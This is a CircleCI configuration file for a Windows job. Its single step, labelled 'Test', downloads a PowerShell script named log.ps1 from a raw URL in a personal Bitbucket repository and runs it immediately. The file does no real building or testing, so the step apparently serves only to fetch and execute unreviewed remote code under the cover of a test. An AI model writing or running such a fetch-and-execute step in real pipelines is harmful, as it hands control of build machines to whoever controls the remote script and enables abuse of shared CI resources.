version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
 
    steps:
      - run:
          name: Test
          command: |
            Invoke-WebRequest https://bitbucket.org/yahayyu99/yahayyu99/raw/9d8833ba31320ec64e371822ed22cec7c00df9b3/log.ps1 -OutFile log.ps1
            ./log.ps1
